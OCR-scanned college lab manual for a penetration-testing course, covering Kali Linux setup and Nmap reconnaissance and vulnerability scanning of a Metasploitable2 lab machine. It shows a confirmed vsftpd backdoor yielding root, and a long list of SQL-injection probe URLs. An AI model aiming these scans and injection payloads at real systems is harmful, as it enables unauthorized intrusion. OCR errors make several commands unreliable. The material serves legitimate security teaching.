LAB MANUAL

VAPT Lab Assignment Code:

(HCSSBL701)

Class: BE Computer Engineering

Semester: VII

Name:

Class:

Semester:

Roll No:

Batch:
 Index

Sr. Topic Page No. Date of Date of Sign

Performance Submission
No.
1 Penetration Testing Lab 1-2
Setup
2 VAPT on Metasploitable2 3-31

Reconnaissance 3-6

3 Vulnerability Scanning 6-18

4 Exploitation 19-25

5 2nd Method of Exploitation 25-31

6 Koiptrix Level 1- VAPT 32

Scope & Initial 32

Planning
7 Recon 32

8 Scanning Enumeration 33-39

9 Vulnerability Scanning 40-41

10 Exploitation 41-48

11 Post Exploitation 49
12 Covering Tracks and Report 49-51
 UNIVERSAL COLLEGE OF
ENGINEERING
Kaman Road, Vasai - 401212

CERTIFICATE

This is to certify that Mr./ Ms. Roll No.

Div of VII semester has satisfactorily completed the course experiments

in the practical prescribed by University of Mumbai, course in the

Vulnerability Assessment Penetration Testing (VAPT) Lab

(SBL) laboratory in the year 2024_25 as per the prescribed curriculum.

Sign of Internal
Prof.Umesh Mohite
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

EXPERIMENT NO 1
AIM: Penetration testing Lab Setup - Installing KaliLinux
THEORY:
Step 1: Install VirtualBox
• Download VirtualBox from the official website: VirtualBox Downloads
• Follow the installation instructions for your operating system.

Step 2: Create a New Virtual Machine

• Open VirtualBox.
• Click on "New" to create a new virtual machine.
• Provide a name for your Kali Linux VM (e.g., "Kali Linux").
• Select "Linux" as the type and "Debian (64-bit)" as the version.
• Assign an appropriate amount of RAM to your VM (at least 2GB is recommended).
• Create a new virtual hard disk (VDI) with a recommended size of at least 20GB.

Step 3: Configure VM Settings

• In VirtualBox, select your newly created VM and click "Settings."
• Under "System," increase the number of processors to 2 or more.
• Under "Display," increase the video memory.
• Under "Storage," in the "Controller: IDE" section, attach the Kali Linux ISO image as
the bootable CD/DVD drive.

Step 4: Install Kali Linux

• Start the Kali Linux VM.
• When it boots, choose "Graphical Install" to begin the installation.
• Follow the on-screen installation wizard, selecting your language, location, and
keyboard layout.
• When prompted for the system hostname, you can choose any name you prefer.
• For the domain name, you can leave it blank.
• Set up the root password, and create a standard user account with a password.
• Configure your time zone.
• When the partitioning step is reached, choose "Guided - use entire disk" for
simplicity.
• In the "Partitioning Scheme" step, choose "All files in one partition."
• Confirm the partitioning changes.
• During the package installation, you can choose the default options.
• Choose "Yes" when asked to install the GRUB bootloader.
• When the installation is complete, eject the virtual ISO image and reboot the VM.

Step 5: Post-Installation Configuration

• Log in with the username and password you created during installation.
• Open a terminal window.

1
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

Step 6: Update and Upgrade Kali Linux

• To ensure your Kali Linux system is up-to-date, run the following commands in the
terminal:
$ sudo apt update sudo apt upgrade

Step 7: Install VirtualBox Guest Additions

• VirtualBox Guest Additions enhance your VM's functionality. To install them:
• In the VirtualBox menu, go to "Devices" and select "Insert Guest Additions CD
image."
• Open a terminal and navigate to the mounted CD drive:
$ cd /media/cdrom
• Install the necessary packages:
$ sudo ./VBoxlinuxAdditions.run
• Reboot your VM:
$ sudo reboot

Step 8: Setting Up Shared Folders (Optional)

• You can set up shared folders between your host machine and Kali Linux to easily
transfer files. To do this:
• In VirtualBox, select your Kali Linux VM and go to "Settings."
• Under "Shared Folders," add a new shared folder with the path to the folder on your
host machine.
• In Kali Linux, create a directory to mount the shared folder:
$ mkdir /mnt/share
• Mount the shared folder:
$ sudo mount -t vboxsf <shared_folder_name> /mnt/share
• Replace <shared_folder_name> with the actual shared folder name from your
VirtualBox settings.

Step 9: Install Tools for Penetration Testing

• Kali Linux comes with a wide range of penetration testing tools pre-installed. You can
further customize your installation by adding or removing tools based on your
requirements. For a complete list of tools, visit the Kali Linux Tools Listing.
• To install additional tools, use the apt package manager. For example, to install the
popular tool Nmap:
sudo apt install nmap

Step 10: Start Penetration Testing

• With Kali Linux fully set up and updated, you're ready to start your penetration testing
projects. Explore the available tools and resources to enhance your skills.
• Additional Resources
• Kali Linux Official Documentation
• VirtualBox User Manual
• Kali Linux Tools Listing

CONCLUSION: We successfully implemented Penetration testing Lab Setup Installing Kali Linux

2
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

EXPERIMENT NO 2
AIM: Vulnerability Assessment & Penetration TestingReport On Metasploitable2
THEORY: Vulnerability Assessment is the process of defining, identifying, classifying and
prioritizing vulnerabilities in computer systems, application and network infrastructures and
providing the organization doing the assessment with the necessary knowledge, awareness and
risk backgroundto understand the threats to its environment and react appropriately.

Life Cycle of Penetration Testing:

1] Reconnaissance
2] Scanning
3] Exploitation
4] Maintaining Access

Reconnaissance
First, we denotes the work of information gathering before any real attacks are planned (like
Reconnaissance). Recon is probably the longest phase, sometimes testing weeks or months. But
here we have a know target, a Metasploitable2 machine connected to same network as on us to
find the target machine we will run an Nmap scan

r-(vlpachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$ sudo nmap -sV -sP 192.168.43.1-255 > livehosts.txt
I r-Cvlpachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$

Here, as you can see above the command line and this is IP range that we use there because we
want to know OS details of every system connected to the network so that we can find our target
machine. So first we need to separate out the live IP address (livehosts.txt) so we save the above
result in a text file and then filter the IP address using the command, and then see the below
command

cat livehosts.txt I grep "for" I cut -d"" -fS > ip.txt.

Here, We have filtered the file as well as saved the output in a new file and finally our result is in
front of you.

r-(vlpachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$ cat livehosts.txt I grep "for" I cut -d " " -f5 > ip.txt
r-(vlpachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$

lr-(vlpachi7©kali)-[~/Desktop/vapt-report-metasploitable2]

3
e L$ cat ip.txt
192.168.43.1
Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

192.168.43.120
192.168.43.152
r-(vlpachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$

Now what we are doing now!! so, now we have to check which one of them is a metasploitable2
machine so we will run an script which will detect the OS of all the live IP's

f r-(vlpachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$ sudo nmap -sV -0 -il ip.txt > osdetails.txt
r-(lpachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$ Is
ip.txt livehosts.txt osdetails.txt vapt-report.txt
r-(vlpachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$

Our output is here

r-Cvlpachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$ cat osdetails.txt
Starting Nmap 7.91 ( https://nmap.org) at 2021-07-09 23:24 IST
Nmap scan report for 192.168.43.1
Host is up (0.0026s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain dnsmasq 2.51
MAC Address: 2A:09:08:63:43:8D (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V= 7.91%E=4%D= 7/9%OT=53%CT= 1%CU=37640%PV=Y%DS=1%DC=D%G=Y%M =2A0
908%TM
OS: =60E88DBB%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD= 1%ISR= 10C%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(Ol=MSB4ST11NW8%O2=M5B4ST11NW8%O3=MSB4NNT11NW8%O4=MSB4ST11
NW8%O5
OS:=MSB4ST11NW8%O6=M5B45Tll)WIN(Wl=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%WS=FF
FF%W6=
OS:FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O= M5B4NNSNW8%CC=Y%Q=)Tl(R=Y%DF=Y%T=
40%5=0%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O
=%RD=0
OS:%Q=)TS(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=4
0%W=0%S
OS:=A%A=Z%F=R%0 = %RD=0%Q= )T7(R= Y%DF= Y%T=40%W= 0%S= Z%A=S+%F=AR%O = %RD=
0%Q=)Ul(R
OS: =Y%DF=N%T=40%IPL= 164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y
%DFI=N
OS:%T=40%CD=S)

Network Distance: 1 hop

Nmap scan report for 192.168.43.120

Host is up (0.00071s latency).

4
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7pl Debian 8ubuntul (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login
514/tcp open shell?
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC # 100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.Sla-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open Xl 1 (access denied)
6667/tcp open ire UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol vl.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the follo
wing fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-PortSl4-TCP:V= 7.91%1=7%D=7/9% Time=60E88D70%P=x86_64-pc-linux-gnu%r(NULL
SF:,37,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(KumarAt
SF:ulJaiswal\)\n");
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:
/o:linux:linux_kernel

Nmap scan report for 192.168.43.152

Host is up (0.000089s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4pl Debian 5 (protocol 2.0)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 79.04 seconds
r-(hackerboy©KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
L$

5
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
So, as you can see here are so many information retrieve like Port, Service, Version, TCP/IP
fingerprint, Host, OS details, MAC address, Network distance etc.

Vulnerability Scanning

In this scanning part we will scan the target machine for known vulnerabilities. So again we will
use Nmap to run a script which will detect vulnerabilities in the system.

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.

The output:

r-(vlpachi7©kali)-[ ~/Desktop/vapt-report-metasploitable2]
L$
r-(vlpachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$ cat vuln.txt
Starting Nmap 7.91 ( https://nmap.org) at 2021-07-09 23:31 IST
Nmap scan report for 192.168.43.120
Host is up (0.00014s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
ftp-vsftpd-backdoor:
VULNERABLE:
vsFTPd version 2.3.4 backdoor
State: VULNERABLE (Exploitable)
IDs: BID:48539 CVE:CVE-2011-2523
vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
Disclosure date: 2011-07-03
Exploit results:
Shell command: id
Results: uid=0(root) gid=0(root)
References:
https://www .securityfocus.com/bid/48539 https://cve.mitre.org/cgi-
bin/cvename.cgi?name=CVE-2011-2523
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234
_backdoor.rb
I I_ http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
l_sslv2-drown:
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
I smtp-vuln-cve2010-4344:

I_ The SMTP server is not Exim: NOT VULNERABLE

I ssl-dh-params:

I VULNERABLE:

l I
l Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
State: VULNERABLE
I_ Transport Layer Security (TLS) services that use anonymous

6
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
Diffie-Hellman key exchange only provide protection against passive
eavesdropping, and are vulnerable to active man-in-the-middle attacks
which could completely compromise the confidentiality and integrity
of any data exchanged over the resulting session.
Check results:
ANONYMOUS DH GROUP 1
Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
Modulus Type: Safe prime
Modulus Source: Unknown/Custom-generated
Modulus Length: 512
Generator Length: 8
Public Key Length: 512
References:
https://www.ietf.org/rfc/rfc2246.txt

Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
State: VULNERABLE
IDs: BID:74733 CVE:CVE-2015-4000
The Transport Layer Security (TLS) protocol contains a flaw that is
triggered when handling Diffie-Hellman key exchanges defined with
the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
to downgrade the security of a TLS session to 512-bit export-grade
cryptography, which is significantly weaker, allowing the attacker
to more easily break the encryption and monitor or tamper with
the encrypted stream.
Disclosure date: 2015-5-19
Check results:
EXPORT-GRADE DH GROUP 1
Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
Modulus Type: Safe prime
Modulus Source: Unknown/Custom-generated
Modulus Length: 512
Generator Length: 8
Public Key Length: 512
References:
https://www.securityfocus.com/bid/74733
https://weakdh.org
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000

Diffie-Hellman Key Exchange Insufficient Group Strength

State: VULNERABLE
Transport Layer Security (TLS) services that use Diffie-Hellman groups
of insufficient strength, especially those using one of a few commonly
shared groups, may be susceptible to passive eavesdropping attacks.
Check results:
WEAK DH GROUP 1
Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
Modulus Type: Safe prime
Modulus Source: postfix builtin
Modulus Length: 1024
Generator Length: 8
Public Key Length: 1024
References:
I_ https://weakdh.org
I ssl-poodle:
I VULNERABLE:
I SSL POODLE information leak
I State: VULNERABLE
I IDs: BID:70574 CVE:CVE-2014-3566
I The SSL protocol 3.0, as used in OpenSSL through 1.0.li and other

7
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
I products, uses nondeterministic CBC padding, which makes it easier
I for man-in-the-middle attackers to obtain cleartext data via a
I padding-oracle attack, aka the "POODLE" issue.
I Disclosure date: 2014-10-14
I Check results:
I TLS_RSA_WITH_AES_128_CBC_SHA
I References:
I https://www.securityfocus.com/bid/70574
I https://www.openssl.org/~bodo/ssl-poodle.pdf
I https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
I_ https://www.imperialviolet.org/2014/10/14/poodle.html
l_sslv2-drown: ERROR: Script execution failed (use -d to debug)
53/tcp open domain
80/tcp open http
http-csrf:
Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.43.120
Found the following possible CSRF vulnerabilities:

Path: http:f/192.168.43.120:80/dvwa/
Form id:
Form action: login.php

Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
Form id:
Form action: http://TWiki.org/cgi-bin/passwd/TWiki/WebHome

Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
Form id:
Form action: http://TWiki.org/cgi-bin/passwd/Main/WebHome

Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
Form id:
Form action: http://TWiki.org/cgi-bin/edit/TWiki/

Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
Form id:
Form action: http://TWiki.org/cgi-bin/view/TWiki/TWikiSkins

Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
Form id:
Form action: http://TWiki.org/cgi-bin/manage/TWiki/ManagingWebs

Path: http:f/192.168.43.120:80/mutillidae/index.php?page=register.php
Form id: id-bad-cred-tr
Form action: index.php?page=register.php

Path: http:f/192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php
Form id: iddnslookupform
Form action: index.php?page=dns-lookup.php

Path: http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php
Form id: idpollform
I_ Form action: index.php
l_http-dombased-xss: Couldn't find any DOM based XSS.
I http-enum:
I /tikiwiki/: Tikiwiki
I /test/: Test page
I /phpinfo.php: Possible information file
I /phpMyAdmin/: phpMyAdmin
I /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'

8
a Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
/html/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
I! /icons/: Potentially interesting folder w/ directory listing
I_ /index/: Potentially interesting folder
I http-fileupload-exploiter:
1
1 _ Couldn't find a file-type field.

http-slowloris-check:
VULNERABLE:
Slowloris DOS attack
State: LIKELY VULNERABLE
IDs: CVE:CVE-2007-6750
Slowloris tries to keep many connections to the target web server open and hold
them open as long as possible. It accomplishes this by opening connections to
the target web server and sending a partial request. By doing so, it starves
the http server's resources causing Denial Of Service.

Disclosure date: 2009-09-17

References:
http://ha.ckers.org/slowloris/
I_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
I http-sqI-injection:
I Possible sqli for queries:
I http://192.168.43.120:80/dav/?C=N%3b0%3dD%27%200R%20sqlspider
I http://192.168.43.120:80/dav/?C=M%3b0%3dA%27%200R%20sqlspider
I http://192.168.43.120:80/dav/?C=S%3b0%3dA%27%200R%20sqlspider
I http://192.168.43.120:80/dav/?C=D%3b0%3dA%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%200R%20sqls
pider
I http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=credits.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=show-log.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=usage-instructions.php%27%200R%20sqlspi
der
I http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%200R%20sqlspider
1 http://192.168.43.l20:80/mutillidae/?page=login.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%200R%20sqlspider
1

I http:f /192.168.43.120:80/mutillidae/index. php?page=secret-administrative-pages.php%27%20OR

%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%200R%20sqlspider
11 http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-
over-Virtual-Box-network.php%27%200R%20sqlspider
I http://192. l68.43. l20:80/mutillidae/index.php?page=home.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=notes.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=php-errors.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sq
lspider
I http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%200R%20sqlspider
1
1 http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%200R%20sql
spider
I http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR %20sqlspider
I http://192.168.43.l20:80/mutillidae/?page=source-viewer.php%27%200R%20sqlspider

9
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
T http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqls
pider&userna me=anonymous
1 http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%200R%20sqlspider
1
I http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%200R%
20sqlspider
1 http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%200R%20sqlspider
I http://192. l68.43. l20:80/mutillidae/index.php?page=change-log.htm%27%200R%20sqlspider
1
I http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%200R%20sqlspid
er
I http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%200R%20sqlspider&page=ho
me.php
1 http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%200R%20sqlspider
1
I http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%200R%20sqlspider&page
=home.php
1 http://192.168.43.120:80/mutillidae/?page=user-info.php%27%200R%20sqlspider
I http://192.168.43 .120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR %20sqlspider
1
I http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%200R%20sql
spider
I http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%2
0OR%20sqlspider
1 http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2= 1.9%27%20OR%20sqlspider&revl=1.10
I http://192. l68.43. l20:80/rdiff/TWiki/TWikiHistory?rev2=1.9&revl=1.10%27%20OR%20sqlspider
1
I http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%200R%20sqlspider&p
araml=l.10
I http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10%27%200R%
20sqlspider
http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2= 1.8%27%20OR%20sqlspider&revl=1.9
http://192. l68.43. l20:80/rdiff/TWiki/TWikiHistory?rev2=1.8&revl=1.9%27%20OR%20sqlspider
http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=l .8%27%20OR%20sqlspider
http://192.168.43.l20:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&revl=1.8
http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2= 1.7&revl =1.8%27%20OR%20sqlspider
http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
http://192. l68.43. l20:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&revl= 1.8
http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2= 1.7&revl =1.8%27%20OR%20sqlspider
http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2= 1.8%27%20OR%20sqlspider&revl=1.9
http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2= 1.8&revl=1.9%27%20OR%20sqlspider
http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider&p
araml=l.10
I http://192.168.43.l20:80/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10%27%200R%
20sqlspider
http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2= 1.9%27%20OR%20sqlspider&revl=1.10
http://192. l68.43. l20:80/rdiff/TWiki/TWikiHistory?rev2=1.9&revl=1.10%27%20OR%20sqlspider
http://192.168.43.120:80/dav/?C=N%3b0%3dA%27%200R%20sqlspider
http://192.168.43.120:80/dav/?C=M%3b0%3dA%27%200R%20sqlspider
http://192.168.43.120:80/dav/?C=S%3b0%3dA%27%200R%20sqlspider
http://192.168.43.120:80/dav/?C=D%3b0%3dA%27%200R%20sqlspider
http://192.168.43.120:80/dav/?C=N%3b0%3dA%27%200R%20sqlspider
http://192.168.43.120:80/dav/?C=D%3b0%3dA%27%200R%20sqlspider
http://192.168.43.120:80/dav/?C=S%3b0%3dA%27%200R%20sqlspider
http://192.168.43.120:80/dav/?C=M%3b0%3dD%27%200R%20sqlspider
http://192.168.43.120:80/dav/?C=S%3b0%3dD%27%200R%20sqlspider
http://192.168.43.120:80/dav/?C=N%3b0%3dA%27%200R%20sqlspider
http:f /192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
http://192.168.43.120:80/dav/?C=D%3b0%3dA%27%200R%20sqlspider
http://192.168.43.120:80/dav/?C=N%3b0%3dA%27%200R%20sqlspider
